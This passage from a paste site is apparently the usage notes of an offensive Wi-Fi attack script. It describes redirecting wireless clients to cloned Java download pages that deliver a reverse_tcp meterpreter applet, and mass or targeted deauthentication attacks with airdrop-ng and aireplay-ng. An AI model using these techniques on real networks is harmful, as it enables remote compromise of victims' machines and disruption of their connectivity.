  1470.             thats availble for that browser to gain a reverse_tcp meterpreter session. This works on any OS.
  1471.  
  1472. JavaPwn: This will redirect WLAN to a SET generated java page with a reverse_tcp meterpreter java applet, It asks to 'run' the
  1473.          Applet while on a cloned/modified version of the Java download page. Cloned pages include google and a fake Sun Java page.
  1474.          Keep in mind that cloned pages need to have images,scripts, and css hosted LOCALLY to work.
  1475.                 -This attack vector is included with 2 templates in the script (google and a java required page).
  1476.                 -KEEP IN MIND - When combining the "clone website" feature of SET with these IPtables command, the template will be
  1477.                                 obscured becuase images cannot be pulled from the remote server. I manually edited the sites to work.
  1478.  
  1479. DeAuth: There are a few different de-authorization attacks included in the script.
  1480.  
  1481.         -The most effective being airdrop-ng, this is a client and rule based mass deauth tool, It is set to deauth every AP around
  1482.         you expect your AP and your wireless card (so you can tunnel via wireless).
  1483.                 -I normally keep a terminal open in /tmp (where i create the config files in the start of the script), and you may
  1484.                  manually edit the deauth configurations as needed. It will not reset until the whole script restarts.
  1485.  
  1486.         -"Mass DeAuth" is a rather simple bash script which uses iwscan to gather APs informations and sends out deauth packets via
  1487.          'aireplay-ng -0', but this is sent to the AP (broadcast) itself, and not client based.
  1488.  
  1489.         -Single DeAuth is just a normal deauth attack, This is if you wanted to be a little stealthy and pick up specific clients.

Submit a correction or amendment below (click here to make a fresh posting)
After submitting an amendment, you'll be able to view the differences between the old and new posts easily.

Syntax highlighting:

To highlight particular lines, prefix each line with {%HIGHLIGHT}




All content is user-submitted.
The administrators of this site (kpaste.net) are not responsible for their content.
Abuse reports should be emailed to us at